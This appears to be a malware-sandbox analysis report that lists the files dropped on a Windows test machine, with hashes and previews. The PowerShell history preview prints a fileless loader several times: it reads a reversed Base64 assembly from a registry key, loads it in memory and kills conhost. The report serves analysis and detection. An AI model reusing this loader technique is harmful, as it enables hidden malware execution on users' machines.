          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="477103" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

          C:\ProgramData\Microsoft\Windows\WER\Temp\WERE2A5.tmp.WERInternalMetadata.xml

          Download File
          Process:C:\Windows\System32\wermgr.exe
          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
          Category:dropped
          Size (bytes):7416
          Entropy (8bit):3.682021714177243
          Encrypted:false
          SSDEEP:96:RSIU6o7wVetb0PjfQr6YBLv+cq4gmfHNV9re17K5aMr4m:R6l7wVeJ0Pjf06YBb+f4gmftq8pr4m
          MD5:C7FDBC5338E9161FA3C3F712B243A484
          SHA1:DA2F6EC9E83E56C094D4A8063F4FCF3F9AC62BFA
          SHA-256:7135CCF1E7CC584727C689D2BED052E26731AF18B3B90F9A6BF12783B8B1FC3D
          SHA-512:A6CC504077E48923B2C521250DE6FB2E3A642C786F5451300A86A8BFF118163943CE7E072A621B551262A8C818B629F87A6B9BD1DB98B3BD4F1A4F6C744E916E
          Malicious:false
          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.7.8.0.<./.P.i.

          C:\ProgramData\Microsoft\Windows\WER\Temp\WERE2C5.tmp.xml

          Download File
          Process:C:\Windows\System32\wermgr.exe
          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
          Category:dropped
          Size (bytes):4899
          Entropy (8bit):4.566885305626781
          Encrypted:false
          SSDEEP:48:cvIwWl8zsVeJg771I9JWWpW8VYdYm8M4JFKlnOtSFyyq8vT0OtJytfmd:uIjfVUI7237VVJFKlnIWT0Aufmd
          MD5:DEEB614075BDA0718FA00D11BF3E7F0D
          SHA1:13BE827C45E9DD9845F43F7C5111A30A35F1A796
          SHA-256:88E02BD6FF0EFEA5A8A20DD0F28DCFC66061B7A0E2A16ECE6094BF82FC65F8D1
          SHA-512:AFA2B9FE44D97AE2D801D600A4DAED2CA103D974EC2F0473C4961C70EB5EBA2BF63D93E1BECCB2034830D69A0E12A18508FF2FE35382815A9B8138E6DE9A15E7
          Malicious:false
          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="477101" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

          Download File
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:data
          Category:dropped
          Size (bytes):3256
          Entropy (8bit):5.417888326413541
          Encrypted:false
          SSDEEP:48:zEzsSU4xymdajm9qr9tz4RIoUQ/78Nf+oHARDGxJZKaVEouYAgwd64rHLjtvwpCX:zEzlHxvJ9qrfIfl7Kf+olJ5Eo9Adrxww
          MD5:DB5EE2B0ECDA2BD58A1D1846F8785BDB
          SHA1:5CE049416112B436E3EA34C97E97FF92CD1E4D86
          SHA-256:C1BBD2DBCD0D56B489D55DA377F1EEB2064B06A3B3E13451B35BB0987E1AE6A9
          SHA-512:ECDFDA0B798E7DAE4E73E3F3D3485D8BD177C6F430B0E09CF3E9816E7D3F0AA968A9AF4CCF60E1806EBE942C8B98DA985D28067272B8F71921FD113B6A6C2751
          Malicious:false
          Preview:@...e................................................@..........H..............@-....f.J.|.7h8..q.......Microsoft.Powershell.PSReadline.H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.................0..~.J.R...L........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.8.................C}...C....n..Bi.......Microsoft.CSharpP...............

          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_04nr4zew.jgq.psm1

          Download File
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Preview:# PowerShell test file to determine AppLocker lockdown mode

          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0hh2ccgh.mns.psm1

          Download File
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Preview:# PowerShell test file to determine AppLocker lockdown mode

          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1foa3zv3.jhi.ps1

          Download File
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Preview:# PowerShell test file to determine AppLocker lockdown mode

          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2hn0xigp.k0l.ps1

          Download File
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Preview:# PowerShell test file to determine AppLocker lockdown mode

          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bv2l0bch.gkp.psm1

          Download File
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Preview:# PowerShell test file to determine AppLocker lockdown mode

          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ccpzu3ex.z2l.psm1

          Download File
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Preview:# PowerShell test file to determine AppLocker lockdown mode

          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dtsg4psr.ua4.psm1

          Download File
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Preview:# PowerShell test file to determine AppLocker lockdown mode

          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dvdq1ak5.y4z.psm1

          Download File
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Preview:# PowerShell test file to determine AppLocker lockdown mode

          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fbvaebua.azz.psm1

          Download File
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Preview:# PowerShell test file to determine AppLocker lockdown mode

          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g0gv2kx5.dc1.ps1

          Download File
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Preview:# PowerShell test file to determine AppLocker lockdown mode

          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gavupmrq.4qb.ps1

          Download File
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Preview:# PowerShell test file to determine AppLocker lockdown mode

          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h5y21vrf.k25.ps1

          Download File
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Preview:# PowerShell test file to determine AppLocker lockdown mode

          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j4oixfh5.vem.psm1

          Download File
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Preview:# PowerShell test file to determine AppLocker lockdown mode

          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lhrf5m4s.2pw.ps1

          Download File
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Preview:# PowerShell test file to determine AppLocker lockdown mode

          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lygwdskb.ogi.ps1

          Download File
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Preview:# PowerShell test file to determine AppLocker lockdown mode

          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tcacbzdw.mwn.ps1

          Download File
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Preview:# PowerShell test file to determine AppLocker lockdown mode

          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uld1bwk3.uyg.ps1

          Download File
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Preview:# PowerShell test file to determine AppLocker lockdown mode

          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w3cytwwg.es3.ps1

          Download File
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Preview:# PowerShell test file to determine AppLocker lockdown mode

          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wrcrcuoy.0ru.psm1

          Download File
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Preview:# PowerShell test file to determine AppLocker lockdown mode

          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zss2thmk.bd2.psm1

          Download File
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Preview:# PowerShell test file to determine AppLocker lockdown mode

          C:\Users\user\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

          Download File
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with CRLF line terminators
          Category:dropped
          Size (bytes):2520
          Entropy (8bit):5.412101461639653
          Encrypted:false
          SSDEEP:48:XiWt/OiWt/OiWt/OiWt/OiWt/OiWt/OiWt/OiWt/OiWt/OiWt/o:yWFWFWFWFWFWFWFWFWFWO
          MD5:CDCB6748F0B73B3A613AD3417A9DA34C
          SHA1:FED9CAE87A855DD85C5257191481E0CF92B02D2D
          SHA-256:D157080E96D8B8B8B940AFBE7A0092D5D4DD6C3671B2F93DB5EB9F43E6E3CA74
          SHA-512:7FC0AD05312F4B14D85FF9E7179EC07B4BF40036344A989AE08544DDA5B5BD05592E8789C2C0984B244CC7FA4D4C42A8B5F9BA71CF07586969D9124B04DDA209
          Malicious:false
          Preview:[AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\mBUojysElnsNYdM' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [a.a]::a('mBUojysElnsNYdM')..Stop-Process -Name conhost -Force..[AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\mBUojysElnsNYdM' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [a.a]::a('mBUojysElnsNYdM')..Stop-Process -Name conhost -Force..[AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\mBUojysElnsNYdM' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [a.a]::a('mBUojysElnsNYdM')..Stop-Process -Name conhost -Force..[AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\mBUojysElnsNYdM' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [a.a]::a('mBUojysElnsNYdM')..Stop-Process -Name conhost

          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

          Download File
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:data
          Category:dropped
          Size (bytes):6224
          Entropy (8bit):3.733029659386897
          Encrypted:false
          SSDEEP:48:/NLGDPlEtEHAE+3Cy2pU2UHjukvhkvklCywQZkq8IlHJnSogZoI5kq8IlLnSogZf:VCba3CATikvhkvCCtAR8I+HLR8IsHf
          MD5:21F351F0A2675229A4B0738194F83411
          SHA1:7D46E16562F7F3EA296CD0EF25A9BAB79FB6D246
          SHA-256:402FA5DD9801C6FD0E7668F6F029223C1F82A0B28E34DDD0DA7F054B95E1CDAB
          SHA-512:5CE735FF1B2E1F74A7BEA179861B39BFC36F3313E158C2E56A22F9DB8F196BBB61C704A27F74F99BC30B1F4B8788B63C335B42A9A4ABE57ECC1406858408F822
          Malicious:false
          Preview:...................................FL..................F.".. ...J.S...C...1...z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S....jQ.1...q.(.1.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.Y.............................^.A.p.p.D.a.t.a...B.V.1......Y....Roaming.@......EW<2.Y....../.....................b$..R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2.Y......0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2.Y......2......................x..W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2.Y......5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2.Y......6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2.Y......u...........

          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF5109c9.TMP (copy)

          Download File
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:data
          Category:dropped
          Size (bytes):6224
          Entropy (8bit):3.733029659386897
          Encrypted:false
          SSDEEP:48:/NLGDPlEtEHAE+3Cy2pU2UHjukvhkvklCywQZkq8IlHJnSogZoI5kq8IlLnSogZf:VCba3CATikvhkvCCtAR8I+HLR8IsHf
          MD5:21F351F0A2675229A4B0738194F83411
          SHA1:7D46E16562F7F3EA296CD0EF25A9BAB79FB6D246
          SHA-256:402FA5DD9801C6FD0E7668F6F029223C1F82A0B28E34DDD0DA7F054B95E1CDAB
          SHA-512:5CE735FF1B2E1F74A7BEA179861B39BFC36F3313E158C2E56A22F9DB8F196BBB61C704A27F74F99BC30B1F4B8788B63C335B42A9A4ABE57ECC1406858408F822
          Malicious:false
